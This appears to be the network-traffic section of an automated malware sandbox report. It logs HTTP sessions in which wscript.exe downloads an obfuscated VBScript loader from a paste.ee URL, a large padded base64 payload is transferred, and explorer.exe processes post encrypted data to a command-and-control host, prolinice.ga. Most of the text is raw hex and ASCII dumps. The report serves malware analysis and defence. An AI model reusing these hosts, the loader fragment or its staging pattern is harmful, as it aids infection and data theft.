                                ETag: "c558-6195e0a9ce944"
                                Accept-Ranges: bytes
                                Content-Length: 50520
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/plain
                                Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.517872095 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.517906904 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.517942905 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.517977953 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.518011093 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.518047094 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.518080950 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.518115997 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                May 28, 2024 09:30:31.518152952 CEST1236INData Raw: 42 37 6c 53 31 49 67 48 46 34 49 4c 4e 53 62 5a 52 55 6c 45 73 30 47 58 4f 30 4a 46 45 74 53 32 55 41 4b 45 76 62 78 59 6e 34 4f 41 43 57 52 4f 53 55 41 46 52 4c 52 4c 54 6b 64 46 6c 49 52 6f 57 6c 78 58 33 55 57 51 68 50 57 47 46 4e 6d 6d 46 4e
                                Data Ascii: B7lS1IgHF4ILNSbZRUlEs0GXO0JFEtS2UAKEvbxYn4OACWROSUAFRLRLTkdFlIRoWlxX3UWQhPWGFNmmFNGFbJ1YZCbBhTZN8xRDsRR5EQHFVIVIdm9mgEZ2W8RIFbVN/lsLqwlWXBmEX+VqIWFk0Y1YQthDe0wPWM054cTBTEdFhIR3UkdXhI7DbwS7V5YKRv9nu8ZFtCy6Y0yYrBRlbO1oVtBEIPwGTM2I5PRRUEpEhNRnVWs
                                May 28, 2024 09:30:31.523232937 CEST1236INData Raw: 58 50 6a 69 5a 71 79 37 4c 63 62 55 69 74 49 65 66 46 66 7a 36 4d 49 51 56 59 57 38 68 51 6c 6c 44 47 55 4a 42 47 43 41 72 74 70 30 52 6c 63 48 69 71 78 58 58 34 4b 37 6b 63 2b 51 55 39 63 35 68 4e 67 4b 33 47 4b 72 54 46 36 55 7a 47 2b 36 44 42
                                Data Ascii: XPjiZqy7LcbUitIefFfz6MIQVYW8hQllDGUJBGCArtp0RlcHiqxXX4K7kc+QU9c5hNgK3GKrTF6UzG+6DBU5LcmZWea9unx6imaq10gFjPRiVq7PZFU51Fb5VY4c/sXYQ0rt2ew4pSHrJWsvMmI1Hviw4klx45vXhSUtii8MV/oRtmRNsv67LXylCxlLDV6V3WeAF0GNsc2kyjAdnwYqZAHQ3adYzIqqutbjlsTkoDGrSfiLJBD


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.224917877.232.129.190801244C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:54.680711031 CEST276OUTPOST /index.php HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://mbhaudjprbp.net/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Length: 275
                                Host: prolinice.ga
                                May 28, 2024 09:30:54.680727959 CEST275OUTData Raw: 6e e2 e2 fb b3 47 86 1f 61 1f b5 15 4b 5c fb f5 de 56 90 26 4f 89 ce ee 84 ea 7f 69 d6 48 32 04 32 c5 ea c3 7b da f7 a1 64 cf c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 65 c2 e2 ce
                                Data Ascii: nGaK\V&OiH22{d0&7H8.6hEvRY;PLeV~8rQ*#OM#'5mj]cJTu=uLm':2z~6&YwSF:YR68DfmLNX+'{RQK:dw!hU!rRyS
                                May 28, 2024 09:30:55.655755997 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 07:30:55 GMT
                                Server: Apache/2.4.59 (Debian)
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=utf-8
                                Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f [TRUNCATED]
                                Data Ascii: 52d88_'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8']0x4d8[K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/o [TRUNCATED]
                                May 28, 2024 09:30:55.655831099 CEST1236INData Raw: d0 7e ed e5 00 cd 59 0c 72 ff c8 4d 8a 9f 4d 22 6a 89 67 05 b3 b9 2f fa 37 ad b4 05 f0 4c 9c d2 83 fb c8 40 2b ca 87 d7 d8 99 59 38 07 be e8 b3 e1 23 2a af e7 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06
                                Data Ascii: ~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#
                                May 28, 2024 09:30:55.655869961 CEST1236INData Raw: 0b c3 87 e9 a2 e5 9c 55 17 aa d8 83 31 db 94 fd c2 b3 3f 55 5c 5f 9f 1e 7e 6b 4e a8 35 a7 e0 42 a5 09 24 43 66 a8 9a a3 42 93 39 9a 14 e7 d4 3b 8a a4 a2 eb 60 3a 8d 8e cb 46 35 1a 7d f4 ef 1b d7 93 ab 25 b8 e4 a0 82 b6 86 fd 09 d8 a2 56 03 b9 bb
                                Data Ascii: U1?U\_~kN5B$CfB9;`:F5}%VRZ8po>f)%h>E(=+d~X{?|Ki06aKs=l?D7D;z6UM"iI"dioztH*{XgQlF}7u\C7:,#
                                May 28, 2024 09:30:55.655904055 CEST1236INData Raw: c8 44 aa c5 8e 2a 48 7b 58 6d b8 bd b5 19 24 5d 9b 9e c8 36 bb ab 0c dc df ea 85 53 6c af be 7d a0 6e 18 29 0f 59 52 49 76 a4 cc 87 01 d7 c4 07 89 48 4c 60 ef 84 a9 cc 3b 27 55 20 28 f5 e4 f0 78 5e 1c 8e b8 52 e9 61 ab 70 7a 85 27 8f 78 0d 7a ea
                                Data Ascii: D*H{Xm$]6Sl}n)YRIvHL`;'U (x^Rapz'xzov:?8,eXO\[yb*b}Jp>0+;*8-hg=hYQIHI,%07?b{Kk'BS\kV#vBc)xB6jX`
                                May 28, 2024 09:30:55.655940056 CEST896INData Raw: 55 a5 e0 10 8f aa 80 d8 b3 fa 1b 2e c2 bc 77 f0 80 ac fa 96 a8 45 c9 83 40 cf ba 03 56 6f 3c 23 18 d6 40 f2 ff aa b2 a1 59 e1 5c 4c d7 24 f6 3d 39 0e 3d 94 1c 92 ea 93 ce c8 3e fc 5a 3e 39 d3 ea ef e1 a4 b4 b6 2d 36 1e 6a da 77 63 fa f0 9c d7 df
                                Data Ascii: U.wE@Vo<#@Y\L$=9=>Z>9-6jwcv-]iM|&-'lZhy~h;'5=YLiy24^!pB-EN9skxX|n},kx\u*1"p}I>-SfjOYfO?d$
                                May 28, 2024 09:30:55.655973911 CEST1236INData Raw: 0e d0 ce 58 e7 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b 09 b2 8f c5 69 b3 e3 2e 68 db 5f 54 ac f4 4b ea f4 95 cf a6 e0 97 64 46 fa b2 4c 4e 19 30 04 78 43 d3 ff 6c 6e 19 40 99 27 48 d4
                                Data Ascii: XomSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:J*mD9Jwx23gk>7)$*YqPVpECH$H;\l=gK3c{R\Q
                                May 28, 2024 09:30:55.656024933 CEST224INData Raw: 3e a7 ca e8 34 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd b9 cf 0d 84 3f d4 e3 ff 65 86 bb 51 5d 2a 36 81 2d d3 fc 54 91 22 56 f9 f4 d4 62 b0 18 c9 6c 00 f4 c6 78 56 7e 7b 79 2f 4f e9 2f
                                Data Ascii: >48|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScdZl"[ff
                                May 28, 2024 09:30:55.656055927 CEST1236INData Raw: 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f
                                Data Ascii: 0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[
                                May 28, 2024 09:30:55.656100035 CEST1236INData Raw: 3e d4 f9 b3 b7 95 fc d2 44 f5 2d db 0a e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc 2d 16 83 7e af 9b 2b 47 23 a5 d8 d3 76 93 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a
                                Data Ascii: >D-pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\LMj8L
                                May 28, 2024 09:30:55.656136990 CEST448INData Raw: d0 51 e3 fa 1c 56 d9 a9 af ec 18 54 b3 8b d7 48 b1 e1 2c 0e b1 00 94 90 28 22 12 5c a6 61 15 23 03 9f 8c 53 9e 5e 78 af 1e 68 82 a5 d0 c5 00 bd e3 6d 58 26 32 0a 21 96 b8 1d 62 20 6b 52 2b 2b c2 aa 0b 00 09 bc 91 31 e1 13 79 7c f5 44 70 e0 24 fb
                                Data Ascii: QVTH,("\a#S^xhmX&2!b kR++1y|Dp$-*WThU=C~ovf# _Hy8"(~}K\BBim2q]^]%;Q\)S{n7SGzfy~~>ELv!


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.224917977.232.129.190803864C:\Windows\SysWOW64\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:31:04.351541042 CEST274OUTPOST /index.php HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://prolinice.ga/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Length: 1395
                                Host: prolinice.ga
                                May 28, 2024 09:31:04.351593018 CEST1395OUTData Raw: 6e e2 e2 fb b3 47 86 1f 61 1f b5 15 4b 5c fb f5 de 56 90 26 4f 89 ce ee 84 ea 7f 69 d6 48 32 04 32 c5 ea c3 7b da f7 a1 64 cf c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 5d 82 f8 a2
                                Data Ascii: nGaK\V&OiH22{deug]H8.6hEvRY;PL]Oc~k_!z1rJC\S7Wx*>x :xGresn*q~DD%w#RCIP6=I.:ua)i1b|Fz1zq"
                                May 28, 2024 09:31:05.507857084 CEST584INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 07:31:05 GMT
                                Server: Apache/2.4.59 (Debian)
                                Content-Length: 409
                                Connection: close
                                Content-Type: text/html; charset=utf-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.2249174188.114.97.34433220C:\Windows\SysWOW64\wscript.exe
                                TimestampBytes transferredDirectionData
                                2024-05-28 07:30:13 UTC302OUTGET /d/oTxeD HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: paste.ee
                                Connection: Keep-Alive
                                2024-05-28 07:30:13 UTC1242INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:13 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: max-age=2592000
                                strict-transport-security: max-age=63072000
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1; mode=block
                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z8r9u%2FpEZLHsKisLbrQfxiT2dEE9xVcJbnNrv1p4adzBuphTu0zcW298N3gUbRn3c%2FOKutzBA%2BYcORJYJDV%2B%2BOWztfPEm%2FUK%2Bog7xAs96bQxrfDNI52rN6zooA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88ac89c11e688c78-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-28 07:30:13 UTC127INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 65 72 79 74 68 72 69 74 65 20 2c 20 64 65 73 6d 61 6e 69 76 61 72 20 2c 20 66 6f 72 6d 61 6c 69 7a 61 72 20 2c 20 62 65 73 70 61 20 2c 20 65 73 63 6f 6c 68 65 64 65 69 72 61 20 2c 20 43 61 6d 61 20 2c 20 65 73 63 6f 6c 68 65 64 65 69 72 61 31 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 76 61 72 20 3d 20 22 20 20 22 0d 0a 20 20 20
                                Data Ascii: 1f7f dim erythrite , desmanivar , formalizar , bespa , escolhedeira , Cama , escolhedeira1 desmanivar = " "
                                2024-05-28 07:30:13 UTC1369INData Raw: 20 20 66 6f 72 6d 61 6c 69 7a 61 72 20 20 3d 20 22 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65
